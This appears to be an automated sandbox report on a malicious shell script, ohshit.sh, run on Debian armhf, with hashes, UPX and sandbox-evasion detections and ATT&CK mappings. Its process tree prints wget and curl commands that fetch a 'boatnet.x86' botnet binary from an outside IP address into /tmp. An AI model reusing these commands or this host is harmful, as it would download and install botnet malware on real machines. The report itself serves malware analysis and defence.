f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6

Analysis

max time kernel
149s
max time network
99s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
09-02-2025 16:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

f0977aee35c9bf421f707b9bfba5d9f7
SHA1

5eacb3c68403f8f9c853f41914f27d5abc8645f5
SHA256

f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6
SHA512

3184f088b0188b537c6a9ba0aa037c586d3267f17a11d4e6fbb65745b21dafbf37506e359dae372993fb6e28a06e3749b0b5a382901ac805cce83988772f53d9

Score

5^/10

antivm discovery upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-2.dat	upx

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.x86	curl

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
PID:645
- /usr/bin/wget
  wget http://194.85.251.9/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:647
- /usr/bin/curl
  curl -O http://194.85.251.9/hiddenbin/boatnet.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:722

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/boatnet.x86

Filesize
29KB

MD5
8231c76be6663e62d7d5a8ea685ff498

SHA1
03177493e6a6d9e3b7aaca572245065ffcfe0575

SHA256
c45cbd5ce92e34f62bd3e1e19c36daf662860aac2a22a5d67924788acc71e3bc

SHA512
1a8eb5eaf84d38252f4535a2a89aca76fadf7854d218c6bca7ec2521ee485d9bd082e3eeff4ec981abaf0e18afc0eed7415ae656d3080b152fb7b35370caa9ac

Download Submit
/tmp/boatnet.x86

Filesize
20KB

MD5
f457e631805bcc5180e35f86fdfe5bee

SHA1
9ba2118cb84740118dcb4c26dea4ae8c1945efdf

SHA256
694e7df65ea715d5d28420a3bac184b2472f4eb4acb8926991f03eece31a6fb1

SHA512
f8d0ca944786af673caf5ce30dc2278e28ee8ec110052f85e3b418080e563f2d86f18f055f3e087691408ff2afc2c68e67cdd75ad461adaaf87a9c7c7720e3b1

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads